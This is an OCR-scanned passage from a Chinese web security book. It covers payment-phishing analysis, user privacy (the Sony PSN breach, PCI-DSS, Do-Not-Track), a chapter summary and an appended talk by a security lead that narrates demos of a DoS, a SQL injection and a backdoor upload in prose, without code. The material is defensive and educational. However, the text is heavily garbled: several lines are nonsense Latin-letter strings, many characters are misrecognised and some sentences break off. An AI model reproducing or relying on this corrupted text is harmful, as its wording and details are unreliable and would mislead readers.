从 两 户 URL 可 以 看 到 ， 这 笔 订单 实际 上 是 支付 到 了 yeepay.com， 而 用 户 
DAR Ce Tel T XTE ° 


再 看 看 了 商品 名 称 ， 变 成 了 “中 国联 通 交 费 元 值 "?， 而 用 户 以 为 自己 买 的 
是 “美的 空调 ?”。 这 个 表单 的 隐藏 字段 说 明了 一 切 。 

此 外 有 两 个 关键 参数 : merSignMsg 和 mer-Cert， 这 是 针对 该 订单 的 签 
名 和 商户 的 证 书 ， 用 来 确定 一 笔 订单 。 

最 终 ， 用 户 在 钓鱼 网 站 上 提交 这 笔 “ 真 实 ” 的 订单 后 ， 通 过 工商 银行 的 
网 银 支 付 了 一 笔 钱 到 yeepay.com。 分 析 与 防范 网 购 流 程 钓 鱼 

在 整个 支付 流程 中 ， 我 们 看 到 了 什么 ? 

一 个 正常 的 网 购 流程 ， 一 般 如 下 : 

商户 (比如 淘宝 网 ) 

第 三 方 支付 平台 (比如 支付 宝 、yeepay) 

网 上 银行 (比如 工商 银行 ) 

这 实际 上 是 一 个 跨 平 台 传 递 信息 的 过 程 。 

贯穿 不 同 平台 的 唯一 标识 ， 是 订单 号 。 订 单 中 只 包含 了 商品 信息 ， 但 
缺少 创建 订单 用 户 的 相关 信息 。 这 是 网 上 支付 流程 中 存在 的 一 个 重大 
设计 缺陷 。 

造成 这 个 设计 缺陷 的 原因 是 ， 在 网 购 过 程 中 的 每 个 平台 都 有 一 套 上 自己 
的 账户 体系 ， 而 账户 体系 之 间 并 没有 对 应 关系 。 因 此 平台 与 平台 之 
则 ， 只 能 根据 订单 本 和 号 的 信息 作为 唯一 的 判断 依据 。 

比如 银行 的 账户 是 银行 卡号 和 开户 名 ， 第 三 方 文 付 平台 有 目 己 的 账 
户 ， 商 户 又 有 自己 的 一 套 账 户 体 系 (比如 京东 商城 ) 。 

SEAR Pe) SRE RAR EM SUK RA “abe”, EXTERA “xyz”, Æ 
银行 的 卡号 是 “xxx”。 IBUUL SETERCRBSIIX L3: PhS VR, JPESE X 
Pf EE PER SCT o TERA Blin, RITENNE Exxx”, MAER K 
商城 的 “abc” 以 及 支付 宝 的 “xyz” 也 是 小 张 ， 在 支付 宝 端 ， 同 样 也 不 知道 
小 张 职 是 京东 商城 的 “abc”。 这 样 的 订单 信息 束 不 完整 。 

因此 是 否 由 小 张 本 人 完成 了 这 个 订单 的 文 付 ， 银 行 端 其 实 是 不 知道 
B 。 银 行 只 知道 这 个 订单 是 否 已 被 文 付 完 成 ， 而 不 知道 是 谁 文 付 了 订 


这 个 缺陷 是 如 何 被 利用 的 呢 ? 

骗子 去 商户 创建 一 个 订单 ， 然 后 交 给 用 户 去 第 三 方 支 付 平台 文 付 ， 或 
者 骗子 创建 一 个 第 三 方 文 付 平台 的 订单 ， 然 后 交 给 用 户 去 银行 支付 
一 一 正如 前 文案 例 中 所 演示 的 一 样 。 

目前 中 国 互联 网 有 成 二 上 万 的 商户， 也 有 数 十 家 像 文 付 宝 一 样 的 第 三 
方 支付 平台 ， 还 有 数 十 家 提供 网 上 支付 业务 的 银行 。 这 些 平台 拥有 的 


账户 体系 已 经 变 得 错综复杂 ， 很 难 再 把 这 么 多 的 账户 一 一 对 应 起 来 。 
解决 这 个 设计 缺陷 的 方法 征 ， 找 到 一 个 唯一 的 客户 端 信息 ， 贯 穿 于 整 
个 网 上 支付 流程 的 所 有 平台 ， 保 证 订单 是 由 订单 创建 者 本 人 支付 的 。 
根据 用 户 的 需求 ， 可 能 还 会 产生 “ 代 付 业务 ”， 这 时 候 还 需要 设计 一 个 
合法 的 代 付 流 程 。 只 有 当 所 有 平台 都 统一 了 订单 拥有 者 的 信息 后 ， 才 
能 真正 解决 这 个 问题 。 目 前 看 来 ， 使 用 客户 端 下地 址 作为 这 个 信息 ， 
比较 经 济 ， 易 于 推广。 

网 络 钓鱼 问题 不 是 某 一 个 网 站 的 问题 ， 而 是 整个 互联 网 所 需要 面 对 的 
问题 。 解 决 钓鱼 问题 ， 需 要 建立 一 条 统一 战线 ， 改 善 和 净化 整个 互联 
网 的 大 环境 。 


16.6 ”用 户 隐私 保护 

2011 年 4 月 ， 索 尼 (SONY) 发 生 了 一 起 令 全 球 震 惊 的 黑客 入 侵 事 件 。 
事件 的 结果 是 索尼 运营 的 PSN 网 络 (一 个 由 SONY 运 营 的 以 PS 游戏 机 为 
终端 的 对 战 网 络 平台 ) 陶 入 瘫痪 ， 同 时 导致 大 量 的 用 户 数 据 被 泄露 。 
索尼 表示 ， 可 能 有 超过 7700 万 的 用 户 注册 信息 或 已 遭 到 黑客 的 盗 取 ， 
而 随后 有 墨客 在 论坛 上 开始 挂牌 销售 220 万 个 来 目 索 尼 PSN 了 网 络 数 据 泄 
露 受害 者 的 个 人 信息 ， 其 中 包括 姓名 、 地 址 、 电 话 号 码 、 信 用 卡号 码 
甚至 后 三 位 CVV2 码 ， 这 些 数据 足以 让 大 量 用 户 的 信用 卡 失 销 。 

之 前 索尼 曾 表示 信用 卡 信息 已 经 得 到 加 密 ， 但 事实 上 数据 库 里 的 内 容 
CARE, RAE BMRA KES: fname, Inam, address, 
zip,country, phone, email, password, dob, ccnum,CVV2, exp date。 事 后 有 
分 析 师 认为 ， 索 尼 在 这 次 事件 中 遭受 的 损失 可 能 会 超过 10 亿 美金 ， 包 
括 业 务 的 丢失 、 不 同 的 补偿 成 本 、 新 的 投资 。 

16.6.1 互联 网 的 用 户 隐 私 挑战 

互联 网 在 给 人 们 芝 来 便捷 的 同时 ， 也 放大 了 负面 事件 的 影响 。 

在 互联 网 时 代 ， 网 站 在 提供 服务 的 同时 ， 也 拥有 了 各 种 各 样 的 用 户 数 
据 。 从 好 的 方面 想 ， 网 站 在 拥有 这 些 用 户 数 据 的 同时 ， 能 够 提供 给 用 
户 更 加 优质 的 服务 。 网 站 收集 用 户 信 息 最 主要 的 用 途 就 是 用 于 精准 地 
投放 广告 ， 广 告 目前 仍然 是 大 多 数 互 联网 公司 最 主要 的 收入 来 源 。 
互联 网 这 个 平台 之 所 以 比 传统 媒体 更 为 移 进 ， 束 是 因为 广告 在 互联 网 
上 可 以 进行 精准 投放 。 试 想 传统 媒体 ， 比 如 电视 ， 在 电视 里 投放 广告 
时 ， 所 有 的 用 户 都 坐 在 电视 机 前 观看 同样 的 广告 。 电 视 里 的 广告 投 
放 ， 只 能 按照 不 同 的 时 间 段 、 不 同 的 频道 风格 进行 大 致 的 分 类 。 比 如 
TED LUBE» GRR E, FECHA IE BIN E RE 
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但 是 在 互联 网 上 ， 可 以 做 到 更 为 精准 的 广告 投放 。 以 搜索 引擎 为 例 ， 
如 果 一 个 用 户 在 搜索 引擎 上 搜索 “杭州 楼 盘 ? 等 关键 词 ， 则 可 以 认为 这 
个 用 户 有 买房 的 意向 ， 从 而 可 以 展示 杭州 房地产 相关 的 广告 。 如 果 搜 
索引 获 更 加 智能 一 些 ， 能 够 记 住 这 个 用 户 ， 知 道 这 个 用 户 前 后 儿 天 一 
HERRIA” `H, “房产 政策 ”等 关键 词 ， 搜 索引 苟 束 可 以 猜测 
这 个 用 户 有 强烈 的 购房 意向 ， 从 而 可 以 进行 更 深度 的 营销 ， 比 如 由 销 
售 直 接 联系 这 个 用 户 。 

这 时 问题 束 来 了 ， 网 站 怎么 知道 如 何 联 系 这 个 用 户 ? 原来 ， 用户 在 网 
站 注册 时 ， 将 手机 号 码 填 写 在 了 个 人 资料 中 ， 当 时 填写 的 理由 可 能 


是 “密码 找 回 *»、“ 注 册 确 认 ” 等 ， 又 或 许 是 今天 SNS 最 常用 的 手段 ， 完善 
多 少 个 人 资料 ， 就 将 获得 多 少 奖 励 。 
除了 用 户 自己 在 网 站 填写 的 个 人 信息 外 ， 网 站 还 可 以 通过 “搜索 记 
录 ”`“ 浏 览 网 页 的 历史 记录 ”`、“IP 地 址 对 应 的 地 理 位 置 > 等 信息 来 猜测 
用 户 的 真实 情况 。 网 站 越 “ 智 能 "， 网 站 所 持 有 的 个 人 信息 就 越 多 。 用 
户 在 有 意 和 无 意 中 会 泄露 大 量 的 个 人 数据 ， 而 用 户 的 个 人 数据 一 旦 未 
能 被 妥善 保管 ， 就 可 能 酿 成 <SONY 数 据 泄露 事件 ”的 悲剧 。 
在 PCI-DSS (支付 卡 行业 数据 与 安全 标准 ) 中 ， 对 企业 持 有 的 “ 持 卡 人 
个 人 信息 ”做 出 了 非常 严格 的 要 求 。 比 如 pin 码 不 得 以 明文 在 网 络 中 传 
输 ， 使 用 后 需要 删除 等 。PCI 认 为 现 有 的 安全 技术 是 复杂 的 ， 要 想 完 美 
地 保护 好 用 户 个 人 信息 比较 困难 ， 最 好 的 做 法 是 限制 数据 的 使 用 
“不 存在 的 数据 是 最 安全 的 ”。 
但 PCI 标 准 目 前 只 在 支付 行业 中 推广 ; 在 其 他 行业 ， 网 站 则 仍然 在 肆 无 
尽 悦 地 收集 用 户 的 个 人 数据 。 目 前 互联 网 缺乏 一 个 对 用 户 隐私 数据 分 
级 和 保护 的 标准 ， 没 有 定义 清楚 哪些 数据 是 敏感 的 ， 哪 些 数据 是 公开 
化 的 ， 从 而 也 无 从 谈 起 隐私 数据 应 该 如 何 保护 。 
比如 用 户 的 手机 号 码 ， 乍 一 看 是 非常 隐私 的 数据 ， 如 果 泄 露 了 ， 可 能 
会 让 用 户 饱 受 垃圾 短信 和 各 类 推销 电话 的 骚扰 。 但 是 有 的 用 户 ， 出 于 
商业 宣传 的 目的 ， 却 希望 其 手机 号 码 能 广 而 告 之 ， 从 而 承接 业务 ， 这 
些 手机 号 码 又 不 属于 隐私 数据 。 类 似 的 例子 还 有 很 多 。 因 此 对 隐私 数 
人 业务 场景 太 复杂 
16.6.2 ”如 何 保护 用 户 隐 私 
在 通常 情况 下 ， 笔 者 认为 ， 如 果 网 站 为 了 提供 更 好 的 服务 而 收集 用 户 
的 个 人 数据 ， 则 应 该 做 到 以 下 几 点 。 
首先 ， 用 户 应 该 拥有 知情 权 和 选择 权 。 网 站 有 义务 告知 用 户 获取 了 什 
么 数据 ， 并 公布 自己 的 隐私 策略 或 条 款 。 用 户 也 有 权利 对 不 喜欢 的 隐 
私 策略 说 不 。 
有 一 位 名 叫 Aza Raskin 的 安全 研究 者 ， 认 为 网 站 在 向 用 户 告 知 自己 的 隐 
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其 次 ， 网 站 应 该 妥善 保管 收集 到 的 用 户 数 据 ， 不 得 将 数据 用 于 任何 指 
定 范 围 以 外 的 用 途 。 比 如 将 用 户 的 个 人 信息 转卖 给 其 他 组 织 则 是 非法 
的 ， 应 该 被 禁止 。 

妥善 保管 这 些 数据 ， 还 意味 着 网 站 有 义务 为 数据 的 安全 性 负责 。 应 该 
达到 类 似 于 PCI-DSS 中 提 到 的 各 种 保护 数据 的 要 求 。 

除了 保证 没有 漏洞 外 ， 网 站 还 应 该 限制 员工 接触 到 原始 数据 。 比 如 监 
控 员 工 是 否 有 “查看 用 户 隐 私 数据 ”的 行为 一 一 没有 人 愿意 让 目 己 的 邮 
件 内 容 或 者 短信 内 容 被 网 站 的 工作 人 员 偷 看 。 

曾经 有 人 怀疑 Google 偷 看 用 户 的 邮件 内 容 ， 因 为 Gmail 里 的 广告 总 是 能 
够 伴随 着 邮件 的 内 容 而 精准 投放 。Gmail 实 际 上 是 使 用 了 算法 实现 这 一 
切 ， 但 这 给 我 们 提 了 个 醒 : 网 站 不 应 该 有 个 人 能 够 接触 到 用 户 的 隐私 
数据 。 在 正常 情况 下 ， 个 人 数据 应 该 只 能 由 算法 或 者 程序 来 计算 ， 工 
作 人 员 不 应 该 有 直接 查看 的 权限 。 

在 有 的 网 站 后 台 系 统 里 ， 工 作 人 员 能 看 到 完整 的 用 户 信息 ， 比 如 完整 
的 身份 证 号 码 、 手 机 号 码 。 这 其 实 古 不 合理 的 设计 ， 在 大 多 数 情况 下 
工作 人 员 并 不 需要 知道 完整 的 数据 即 可 完成 工作 。 因 此 使 用 “ 掩 码 * 的 
方式 会 更 加 的 合理 和 人 性 化 。 


身份 证 43910119990909xxx4 
FHL: 13666661xx4 


16.6.3 Do-Not-Track 

目前 ， 越 来 越 多 的 人 认识 到 隐私 保护 的 重要 性 。 美 国 国 会 议员 系统 通 

过 立法 确保 用 户 有 权 拒 绝 网 上 追踪 用 户 的 行为 ， 这 就 是 引起 极 大 争议 

的 “Do-Not-Track”。 

Do-Not-Track 工 作 在 浏览 右上。 该 选项 打开 后 ， 将 在 HTTP 头 中 增加 一 

个 header， 用 以 告诉 网 站 用 户 不 想 被 追踪 。 最 初 由 美国 政府 权威 机 构 联 

邦 贸易 委员 会 (Federal Trade Commission) 发 布 ， 其 灵感 来 自 于 阻止 电 

话 推销 的 “全 美 不 接 受 电 话 推销 名 单 ”(do-not-call registry) ° 

H 前 一 些 主 流 浏 览 器 比如 Firefox 4 ^ IE 9 的 新 版 本 都 开始 文 持 此 项 功 

能 。 

可 是 Do-Not-Track 本 喘 并 不 受 欢 迎 。Yahoo、Google 等 互联 网 巨头 均 对 

Do-Not-Track 表 示 了 一 定 的 抵制 ， 一 开始 是 不 愿意 加 入 ， 到 后 来 甚至 联 

名 抗议 试图 阻止 此 项 法 案 生 效 。Do-Not-Track 势 必 将 影响 到 广告 主 的 利 

fni Oo 

E 人 中 ， 其 是 否 能 给 隐私 保护 带 来 新 的 变化 需要 拭 
DARE ° 


Do-Not-Track 只 是 工作 在 浏览 絮 中 ， 工 作 在 HTTP 层 ， 但 隐私 数据 收集 
问题 其 实 已 经 渗透 到 互联 网 的 每 一 个 层面 。 

在 非 英 语 国家 ， 产 生 了 一 个 很 神奇 的 产品 : 输入 法 。 

在 起 初 ， 输 入 法 只 是 一 个 PC 上 的 小 应 用 程序 ， 但 是 后 来 搜狐 挖掘 出 输 
入 法 的 价值 。 

在 中 国 ， 人 人 离 不 开 输 入 法 。 人 们 上 网 聊天 、 写 邮件 、 使 用 搜索 引擎 
都 要 使 用 输入 法 ， 包 括 笔者 现在 坐 在 电脑 前 融 这 篇 文章 ， 同 样 也 离 不 
开 输 入 法 。 输 入 法 才 是 中 国人 上 网 的 第 一 入 口 ! 云 输入 法 因此 而 生 。 
在 为 用 尸 提供 更 好 体验 的 同时 , “云端 * 也 可 以 不 断 地 和 猜测 用 户 在 想 什 
么 ， 而 这 是 建立 在 大 量 的 用 户 数 据 基 础 之 上 的 。 这 些 用 户 敲 打出 来 的 
数据 有 助 于 帮助 公司 确立 商业 目标 。 

比如 ， 云 端 如 果 发 现 大 多 数 输 入 法 的 用 户 都 开始 敲打 “股票 >、“ 股 息 ” 等 
词语 ， 则 说 明 安 观 经 济 可 能 发 生 了 一 些 变 化 。 还 可 以 像 分 析 搜 索引 擎 
关键 词 一 样 ， 分 析 用 户 使 用 输入 法 的 习惯 。 比 如 ， 如 果 一 个 用 户 经 党 
则 可 以 猜测 这 个 用 户 的 职业 可 能 是 工程 师 或 者 是 
学 老 。 

2011 年 ， 芋 果 的 iPhone 和 Google 的 An-droid 手 机 系统 先后 被 曝光 出 有 跟 
踩 用 户 地 理 位 置信 息 的 行为 ， 引 起 轩然大波 。 这 只 是 一 个 开端 ， 接 


16.7 小 结 

本 章 讲述 的 是 互联 网 安全 中 ， 网 站 最 关心 的 业务 安全 。 

互联 网 公司 在 发 展业 务 时 ， 也 许 会 忽略 自身 的 安全 防护 和 漏洞 修补 ， 
但 一 定 不 会 漠视 业务 安全 问题 。 因 为 业务 安全 问题 ， 直 接 损害 的 是 用 
户 的 利益 、 公 司 的 利益 ， 这 些 安 全 问题 会 有 真正 的 切肤之痛 。 因 此 无 
论 是 公司 内 部 ， 还 是 政府 、 行 业 ， 甚 至 是 社会 曙 论 ， 都 会 产生 足够 大 
的 压力 和 推动 力 ， 迫 使 互联 网 公司 认真 对 待业 务 安全 问题 。 
互联 网 公司 要 想 健康 地 发 展 ， 离 不 开业 务 安全 。 把 握 住 业 务 安全 ， 对 
于 公司 的 安全 部 门 来 说 ， 就 真正 把 握 住 了 部 门 发 展 的 命脉 ,这 是 真正 
看 得 见 、 摸 得 着 的 敌人 。 业 务 安全 问题 更 加 直接 ， 损 失 的 都 是 真 金 白 
银 ， 考 核 的 目标 也 易于 设 定 。 

安全 工程 师 可 以 承担 更 大 的 责任 ， 帮 助 公司 的 业务 健康 成 长 。 


(Pt) 麻烦 的 终结 者 

各 位 站 长 、 各 位 来 宾 大 家 下 午 好 ! 今天 我 演讲 的 题目 是 “麻烦 的 终结 
者 ”， 我 觉得 安全 问题 对 于 中 小 网 站 站 长 来 说 并 不 能 算 业 务 发 展 上 的 重 
大 阻力 ， 也 并 不 是 迈 不 过 去 的 难关 ， 安 全 问题 更 多 的 时 候 像 是 一 种 麻 
烦 ， 非 常 讨 厌 ， 但 是 你 又 不 得 不 去 面 对 它 。 就 像 你 的 牙 疼 ， 会 让 你 吃 
不 下 饭 ， 睡 也 睡 不 香 ， 牙 疼 不 是 病 ， 疼 起 来 要 人 命 。 安 全 问题 是 令 人 
头疼 的 厅 烦 ， 而 我 ， 是 一 个 厅 烦 的 终结 者 。 

我 这 个 人 特别 人 麻烦 ， 但 是 每 当 我 出 现 的 时 候 ， 丈 意味 着 有 厅 烦 出 现 
了 ， 所 以 我 会 尽 我 的 人 全力， 把 这 些 太 烦 以 最 快 的 速度 解决 抒 。 

首 移 自 我 介绍 ， 我 叫 吴 其 清 ， 来 自 阿 里 巴巴 集团 信息 安全 中 心 ， 我 是 
西安 交通 大 学 少年 班 毕 业 ，2000 年 开始 进行 网 络 安全 研究 ， 有 10 年 的 
安全 研究 经 验 。 

ROSE ARM REE, tenn PRE. VE. BENZ 
工作 ， 帮 他 们 建立 了 应 用 安全 体系 ， 现 在 我 主要 在 阿里 云 负 责 云 计 算 
安全 、 全 集团 的 应 用 安全 ， 以 及 全 集团 的 反 钓 鱼 、 反 欺诈 工作 © 
今天 网 站 面临 了 很 多 威胁 ， 有 各 种 各 样 的 威胁 一 一 有 人 在 网 站 发 反动 
政治 信息 ; 刚才 主持 人 还 提 到 美女 的 U 盘 和 于 了 ， 隐 私 可 能 受到 威胁 。 
今天 中 小 网 站 面临 的 各 种 威胁 也 是 我 们 曾经 过 到 过 的 。 

淘宝 、 阿 里 巴巴 、 支 付 定 、 阿 里 云 、 雅 虎 中 国 ， 这 些 网 站 也 是 从 小 网 
站 成 长 起 来 的 ， 我 们 曾经 遇 到 过 的 问题 ， 也 是 中 小 网 站 明天 可 能 会 遇 
到 的 问题 ， 因 为 明天 中 小 网 站 也 必然 成 长 为 大 网 站 。 当 有 一 天 我 们 的 
站 长 打开 他 的 网 站 时 发 现 站 点 已 经 打 不 开 了 ， 造 成 打 不 开 的 原因 可 能 
非常 多 ， 可 能 是 硬件 坏 了 、 磁 强 坏 了 ， 也 有 可 能 是 IDC 机 房 网 络 断 
了 ， 当 然 也 有 可 能 是 被 拒绝 服务 攻击 了 ， 这 完全 是 有 可 能 发 生 的 。 

这 是 我 们 昨 鉴 刚 录 的 一 段 视 频 ， 这 是 我 们 目 己 的 一 个 本 地 测试 网 站 ， 
我 们 使 用 一 个 工具 测试 ， 在 两 三 秒 之 后 ， 发 现 这 个 网 站 打 不 开 了 ， 把 
这 个 工具 停 掉 ， 网 站 立马 恢复 正常 。 这 种 攻击 完全 是 有 可 能 发 生 的 ， 
这 个 漏洞 惑 是 上 个 月 即 11 月 ， 在 一 个 安全 的 权威 大 会 上 有 两 个 国外 的 
安全 人 研究 者 所 演示 的 Web Server 层 的 漏洞 ， 这 和 传统 的 拒绝 服务 攻击 
不 一 样 ， 它 工作 在 应 用 层 ， 传 统 保护 方案 可 能 会 失效 。 

它 的 攻击 条 件 非常 简单 ， 刚 才 只 用 了 一 人 台 PC 就 把 网 站 打 宕 掉 ， 我 们 事 
后 曾经 利用 这 个 漏洞 测试 过 一 些 朋友 网 站 ， 发 现 威力 非常 强大 ， 包 括 
我 们 上 自己 内 网 的 办 公 系 统 ， 也 是 刚刚 一 把 工具 打开 ， 网 站 马上 宕 掉 。 
这 种 威胁 中 小 企业 都 面临 着 ， 我 在 03 年 也 做 过 一 个 网 站 ， 做 得 非常 


大 ， 后 来 不 知道 什么 原因 ， 有 人 拒绝 服务 攻击 我 的 网 站 ， 之 后 这 个 网 
站 再 也 没有 打开 过 ， 我 心 灰 意 冷 ， 束 没有 想 再 开 起 来 。 

在 02、03 年 时 ， 我 们 没有 技术 条 件 和 环境 解决 这 种 问题 ， 但 是 在 今 
天 ， 我 们 完全 有 可 能 解决 ， 在 安全 性 上 叫 可 用 性 、 业 务 连 续 性 的 问 
题 ， 我 们 要 让 网 站 一 直 活 着 ， 不 能 让 它 打 不 开 。 我 们 如 何 解决 拒绝 服 
务 攻击 ? 在 前 面 陈 波 介绍 他 在 弹性 云 计 算 里 面 有 很 多 方案 ， 包 括 安 全 
域 、 分 布 式 防火 墙 ， 弹性 云 的 环境 当中 还 有 很 多 网 络 设备 来 保护 网 络 
层 对 抗拒 绝 服 务 攻击 。 拒 绝 服 务 攻击 分 两 种 ， 第 一 种 是 前 面 陈 波 提 到 
的 ， 在 网 络 层 ， 传 统 的 SYN flood 等 攻击 ， 我 们 通过 弹性 云 的 很 多 方案 
已 经 保护 得 很 好 了 。 

另外 一 种 是 在 Web Server 层 ， 在 应 用 层 ， 可 能 存在 拒绝 服务 攻击 ， 这 
是 今天 整个 互联 网 都 较为 缺乏 应 对 手段 的 攻击 ， 但 是 我 们 部 门 已 经 解 
决 抒 了。 我 们 在 Web Server 层 定制 一 些 模块 ， 对 WebServer 进 行 保护 ， 
我 们 通过 分 析 网 络 和 连接、 频率、 地 域 、 客 户 端 信息 ， 最 终 进行 判断 ， 
哪个 请 求 是 坏 的 。 

你 担心 漏洞 吗 ? 其 实 漏洞 跟风 险 还 有 一 定 距离 。 漏 洞 首 移 要 有 人 使 
用 ， 然 后 才 会 成 为 风险 。 什 么 人 会 去 使 用 漏洞 ?9 这 其 实 是 一 个 很 大 的 
ES o WWE ARITE RTA? 我 们 可 以 看 一 下 演示 。 这 是 本 地 的 测 
试 网 站 ， 我 们 演示 一 次 入 侵 过 程 ， 这 是 一 个 SQL 注入 漏洞 ， 像 这 种 黑 
客 工 具 在 网 站 可 以 随便 下 载 到 ， 而 且 有 很 多 不 同 版 本 。 

我 们 的 攻击 者 演 试 了 网 站 后 台 ， 路 径 是 Ad-min， 发 现 路 径 是 正确 的 ， 
在 入 侵 过 程 当 中 ， 很 多 是 靠 猜 的 。 我 跟 很 多 资深 黑客 都 聊 过 ， 他 们 有 
大 概 30% 是 靠 运 气 才 能 够 拿 到 一 个 系统 权限 ， 通 过 注入 这 个 漏洞 ， 找 
到 了 系统 管理 员 这 张 表 ， 然 后 找到 用 户 名 ， 现 在 正在 破解 密码 。 这 时 
候 攻击 者 把 16 位 的 MD5 值 放 在 表 上 查 ， 马 上 找到 了 对 应 的 密码 ， 然 后 
登录 进 网 站 后 人 台 。 但 是 现在 还 没有 完 ， 在 后 人 台 还 有 一 个 能 够 上 传 图 片 
的 功能 ， 这 里 又 有 一 个 漏洞 ， 这 里 没有 对 图 片 类 型 做 验证 ， 所 以 攻击 
上 传 后 门 程 序 ， 现 在 他 已 经 拿 到 了 一 个 后 门 ， 可 以 为 所 和 欲 为 


可 以 浏览 C 盘 目 永 ， 包 括 下 载 文件 ， 攻 击 者 上 传 一 个 页 面 ， 证 明 他 入 
侵 过 ， 这 吏 是 一 个 漏洞 引发 的 血案 。 

我 们 不 得 不 担心 漏洞 ， 因 为 漏洞 最 终 会 成 为 很 三 重 的 风险 ， 代 码 是 人 
写 的 ， 程 序 员 是 人 ， 不 是 神 ， 只 要 是 人 写 的 代码 ， 必 然 产 生 漏洞 。 漏 
洞 不 能 被 消灭 ， 但 是 可 以 被 控制 。 


这 是 我 从 国内 现在 比较 著名 的 一 个 网 站 “乌云 "上 截取 的 图 。 这 是 一 帮 
安全 研究 者 弄 出 来 的 网 站 ， 会 收集 各 个 站 点 的 漏洞 ， 通 报 给 厂商 。 在 
这 个 列表 上 (是 我 昨天 刚 抓 到 的 ) ， 列 举 了 8 月 份 到 12 月 3 号 的 很 多 大 
网 站 漏洞 ， 很 多 大 网 站 榜 上 有 和 名， 有 网 易 、QQ、 凤 凰 网 ， 还 有 百度 、 
新 浪 ， 所 以 说 大 网 站 也 会 出 现 漏洞 ， 小 网 站 也 不 可 避免 。 

我 们 是 怎么 解决 漏洞 的 ? 现在 我 所 在 的 团队 是 国内 非常 专业 的 一 支 团 
队 ， 圈 子 里 的 朋友 可 能 都 知道 ， 我 们 团队 里 面 招 了 很 多 各 个 安全 领域 
的 专家 ， 有 无 线 安全 专家 、 客 户 端 安 全 专家 、 网 络 安全 专家 、 应 用 安 
全 专家 ， 我 们 这 些 人 研究 出 很 多 方法 来 控制 漏洞 。 现 在 阿里 巴巴 全 集 
团 下 有 几 千 人 的 工程 师 团队 ， 每 天 写 代码 ， 每 周 发 布 的 项 目 有 30 个 ， 
小 需求 有 200 个 ， 代 码 量 非常 大 。 我 们 的 目标 是 要 检查 每 一 行 代码 的 安 
全 ， 但 是 我 们 只 有 30 多 个 人 ， 所 以 我 们 选择 了 四 两 拨 千 斤 的 方法 。 我 
们 总 结 一 些 常见 的 代码 问题 ， 自 己 定制 一 些 检测 工具 ， 对 每 一 行 代码 
进行 检查 ， 保 证 程序 员 写 出 来 的 代码 是 安全 的 。 

我 们 现在 还 定制 了 自己 的 安全 扫 措 器， 扫描 了 包括 淘宝 、B2B、 支 付 
宝 在 内 的 6000 万 网 页 ， 这 是 今天 任何 一 个 商用 安全 扫描 器 都 做 不 到 
的 ， 但 是 我 们 做 到 了 。 这 6000 万 页 面 是 我 们 精 选 出 来 可 能 造成 安全 危 
害 的 页 面 ， 我 们 会 在 第 一 时 间 把 扫描 出 来 的 漏洞 通报 给 业务 方 ， 通 报 
给 应 用 ， 通 报 给 程序 员 ， 我 们 会 在 第 一 时 间 掌控 漏洞 ， 我 们 要 跑 在 黑 
客 前 面 ， 要 比 黑客 更 早 地 发 现 漏洞 所 在 。 

当 漏 洞 变 成 了 风险 时 ， 我 们 的 站 长 可 能 会 担心 杀毒 软件 突然 弹出 一 个 
框 说 网 站 上 面 有 木马 ， 这 件 事情 是 非常 令 人 头疼 和 讨厌 的 ， 给 网 站 的 
声誉 也 带 来 非常 大 的 影响 。 互 联网 中 有 一 个 黑色 产业 链 在 不 断 谋求 发 
展 ， 不 断 在 追寻 利益 ， 可 能 很 多 在 座 的 朋友 都 看 过 ， 前 些 时 候 中 央 电 
视 台 报道 过 的 黑色 产业 链 一 “一 条 木马 产业 链 ， 他 们 是 怎样 盈利 的 ? 
最 主要 的 盈利 点 ， 在 这 个 环节 是 盗用 游戏 账号 、 网 银 账号 ， 然 后 卖 
掉 ， 这 是 数 十 亿 的 产业 链 。 在 网 站 上 面 攻 击 用 户 ， 包 括 大 网 站 用 户 、 
中 小 网 站 用 户 ， 这 条 产业 链 的 攻击 目标 是 最 终 用 户 ， 而 这 些 用 户 也 是 
中 小 网 站 用 户 ， 是 重合 的 ， 所 以 这 就 是 他 们 利益 的 驱动 所 在 。 我 们 很 
多 站 长 想 不 明 白 ， 为 什么 这 些 黑客 莫名 其 妙 地 跑 到 我 们 网 站 上 来 攻击 
我 ， 这 就 是 他 们 的 利益 点 所 在 ， 因 为 每 年 有 几 十 亿 利益 驱动 在 背后 ， 
所 以 会 千方百计 找 流量 ， 大 网 站 攻 不 进去 就 找 小 网 站 ， 小 网 站 也 能 给 
他 们 带 来 可 观 流量 ， 导 致 他 们 最 后 获得 丰厚 收入 。 

就 像 苍蝇 不 盯 无 终 蛋 ， 有 漏洞 就 有 黑客 攻击 的 可 能 ， 不 能 抱 有 侥幸 心 
理 。 我 们 如 何 解 决 扶 马 的 风险 ? 挂 马 的 问题 令 人 非常 头疼 ， 我 这 里 有 
两 个 数字 : 一 个 是 10 万 ， 一 个 是 10 分 钟 ， 阿 里 巴巴 集团 有 一 套 系统 能 


够 定时 周期 性 检测 这 个 网 站 是 不 是 挂 马 。 业 界 普 过 有 两 种 做 法 : 一 种 
做 法 是 检测 原 代码 ， 看 是 否 有 危害 性 的 JS 脚本 ， 另 一 种 做 法 驶 是 用 类 
似 虚 拟 机 的 做 法 ， 在 虚拟 机 中 用 浏览 器 访问 网 页 ， 然 后 在 后 人 台 有 一 系 
列 杀 毒 软件 判断 网 页 十 不 是 挂 互 。 我 们 两 者 宵 用 ， 目 前 监控 10 万 网 
页 ， 这 10 万 网 页 是 我 们 精 选 出 来 的 阿里 巴巴 、 淘 至 、 文 付 至 可 能 存在 
挂 马 风险 的 网 页 。 

10 分 钟 羡 指 我 们 能 在 10 分 钟 之 内 ， 如 有 果 10 万 个 网 页 当中 某 一 个 网 页 挂 
马 ， 殉 能 发 出 警报 。 这 跟 扫 描 不 太一 样 ， 扫 摘 周 期 会 比较 长 ， 而 挂 马 
仿 测 周期 非常 短 ， 这 就 十 我 们 解决 挂号 的 思路 。 目 前 这 个 方法 也 是 得 
到 实践 认可 的 ， 确 实 能 够 从 里 面 发 现 很 多 挂 马 问题 的 存在 。 最 让 人 头 
疼 的 是 这 些 挂 马 很 可 能 并 不 是 我 们 目 己 网 站 出 现 调 洞 ， 很 有 可 能 走 我 
们 的 外 部 合作 者 ， 比 如 说 广告 ， 如 果 内 容 供应 商 页 面 里 面 挂 马 了 ， 访 
问 我 们 网 站 时 ， 杀 毒 软件 也 会 报警 。 这 束 锡 枉 了 ， 我 们 没 做 错 事 ， 却 
育 凌 锅 。 所 以 检测 挂 马 这 个 工作 非常 有 意义 。 

我 还 发 现 了 另外 一 条 产业 链 ， 一 条 比 挂 马 产 业 链 隐 藏 得 更 深 、 更 可 
